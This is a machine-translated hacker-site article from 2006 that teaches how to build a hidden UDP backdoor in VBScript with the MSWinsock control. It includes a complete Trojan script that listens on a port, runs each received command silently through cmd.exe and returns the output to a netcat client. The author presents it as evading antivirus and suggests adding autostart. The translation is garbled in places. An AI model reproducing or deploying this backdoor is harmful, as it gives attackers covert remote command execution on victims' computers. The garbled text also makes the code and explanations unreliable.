VBS+MSWinsock build smart UDP Backdoor-vulnerability warning-the black bar safety net

2006-11-03T00:00:00
ID MYHACK58:62200612672
Type myhack58
Reporter 佚名
Modified 2006-11-03T00:00:00

Description

About a year ago, the VBS script virus also lifted a burst of craze, a large group of VBS virus on the Internet prevalent. Then the VBS virus almost all with FSO, MAPI as a virus engine, so I would think that VBS could access the network? If it can be port of connection, that magical. Since then, I try to find related to VBS the network class information, unfortunately looking for a long time, what the harvest did not, until a month before the College entrance examination is over, I can calm down and engage in this stuff, and finally have a little progress. Now analyze the VBS works. VBS stands for“Visual Basic Scripts”, due to the VBS is by the Visual Basic separate out an object-oriented scripting language,so its syntax with Visual Basic almost, but also against the Object to achieve its other advanced features. Is nothing but VBS is Wscript. exe or Cscript. exe to explain, so it does not need to be compiled and run directly on the line, so this is also a VBS script to do the hack tools expertise: General antivirus software and not for VBS are interested in. Because VBS is an object-oriented scripting language, so Microsoft's a lot of ActiveX components are available through the“CreateObject(“ObjectName”)”to create a reference, this may be Microsoft's program interface! Maybe a used VB to write the network program of the friends know, using VB to write the network program generally, there are two kinds: one is to call the Windows API function, the second is with the VB that comes with the Winsock control, which is in the Windows system directory see“MSWinsock. ocx”is. Since the former API function is more complex, a lot of my friends prefer to use VB comes with the Winsock control, do not know we have not noticed that the Winsock control, in fact it is me speaking in front of the ActiveX component, which provides access to TCP and UDP network services easy way to write client or server applications, without having to learn about TCP details or call low level Winsock APIs. By setting the control's properties and call its methods can be easily connected to a remote machine on the go, and can also be two-way exchange of data. Since found the access to the network engine, how to use? Usage is not VB as in use? The Winsock control usage is substantially the same VB on the same, but in VBS, ActiveX control is not like VB, as can be seen, to be in the VBS on the reference it is of course to first create its object. Create a method like to create the FSO, etc. of the image. Create a new text file, in it write: -------------------------------------------------- Set Sock=CreateObject("MSWinsock. Winsock") Sock. AboutBox -------------------------------------------------- Save As*. vbs run it, you can see the registration in your system in WinSock controls the related information, as shown in Figure 1.

Figure 1 How can't you like? Happy now, don't worry, I'll talk about it. Since the object creation is successful, of course, is to be like VB that use it. In the VBS to create the WinScok not like VB as a graphical interface that set the parameters on the line, should be step by step to set up your. what is the Protocol. In the WinSock control to set the Protocol by“Protocol”to set, such as a sock. Protocol=0 or sock. Protocol=1。 Note that when the“Protocol”value to“0”when the Protocol is TCP; a value of“1”, the Create is UDP. I first introduce the relevant WinSock control references of the basic methods, and events: LocalHostName //get local host name LocalIP //get the local host IP SocketHandle //made to create SOCK handle RemotePort //set or get the remote port LocalPort //set or get the local port State //return to create a sock for like state(substituting it as follows){ 0 the default. Off 1 Open 2 listens 3 connection hangs 4 identify the host 5 has been identified the host 6 are connected 7 has been connected 8 peer is closing the connection 9 error } BytesReceived //return the received current at the receiving end to buffer the data of the number of Connect(RemoteHost,RemotePort) //establish the remote connection, RemoteHost remote host IP, RemotePort remote host port Listen //so that the SOCK listening The SendData/GetData //send or receive data Close //close the image Bind(LocalPort, LocalIP)//bind the local port. Those basic things I finished, and below I test the remote host session. (UDP), the following is a VBS file, you can try code as follows(file sock-udp. vbs): the ---------------------------------------- dim revdata dim sendata //Create Winsock on like set sock=createobject("MSWinsock. Winsock") //Use the UDP Protocol //Establish a connection sock. Protocol=1sock. Connect "127.0.0.1",1 2 3 4 //Define the data to be transmitted sendata="Hello!!!"& amp;chr(1 3) //Send to send the data sock. senddata sendata do //If there is data to respond to will display it if sock. BytesReceived>0 then //Define the receive data type(data type vbByte and vbInteger, the vbLong, the vbSingle //vbDouble, the vbCurrency, the vbDate, a vbBoolean, and vbError, a vbString, the vbArray+vbByte) //Only defined to receive the data type to receive data, or will receive is a bunch of garbled; sock. getdata revdata,vbString; sendata=inputbox (revdata,"RecviedData","please input you want to send information") sock. senddata senddata & chr(1 3) //When received contains the"exit"string to the end of the VBS process if instr(revdata,"exit") then exit do else end if loop //Off to the image socket sock. close ------------------------------------------ Then use“nc-u-l-p 1 2 3 4”listen on a local UDP port 1 2 3 4, and then run just write the VBS file, look! My NC has a reaction(as shown in Figure 2 shown).

Figure 2 Then look at the firewall in the connection state, as shown in Figure 3.

Figure 3 Inside“MicroSoft (r) Windows Based Script Host”is our VBS the main process. In NC we may also send information, chat, how? A simple UDP C/S has been completed. Below I'll write a about it use it, since it can access the network, of course, is to use it to do a VBS Trojan! Old codecs are not against it! Haha, Let's Go! -------------------------- Dim revdata set sock=createobject("MSWinsock. Winsock") set sc=createobject("WScript. Shell") Set fso =CreateObject("Scripting. FileSystemObject")

sock. Protocol=1 //This of course is the UDP Protocol identifier. sock. bind 1 2 3 4 //bind local UDP port

Do if sock. BytesReceived>0 then sock. getdata revdata,vbString if instr(revdata,"exit")>0 then exit do else on error resume next N="C:\" & fso. GetTempName 'cmd=right(revdata,len(revdata)-4) cmd=left(revdata,len(revdata)-3) //Use bind cmd output call sc. Run ("cmd.exe /c" & cmd & "> " & n,0,True) Set txf = fso. OpenTextFile(n,1,false,0) //The output file is read into memory, use SendData to send to the client sock. senddata txf. readall & vbcrlf & vbcrlf txf. close call the fso. DeleteFile(N,True) end if //HEE HEE,here is my copyright Oh sock. senddata "--End--" & vbcrlf & "ForHelp exit:end|run:<RunFileName>" & vbcrlf & "Maked by Attrib Data:2004.7.28" & vbcrlf & vbcrlf end if Loop sock. senddata "connection was closed!" & vbcrlf sock. close sock=nothings ------------------- To this, the Code of the basic frameConfiguration has been completed, in order to do a mighty Trojan in code of Riga, such as boot automatically run, etc. Due to the VBS program does not set the error protection, probably some error will appear the thread jumped collapse, interested friends can own try. Usage is to put this VBS Backdoor running on the service side, after you use your NC is connected, because the use of the UDP Protocol, the NC command line is“NC –u IP Port”,remember to add the“-u”parameter Ah, after like WinShell as used on the line, the following is in my machine in the test screenshot as shown in Figure 4。

Figure 4 As for TCP how to write, the truth is also with UDP, almost, I here will not write more, and everyone can own research. If you have any good method can also and I together study. Thank you for viewing.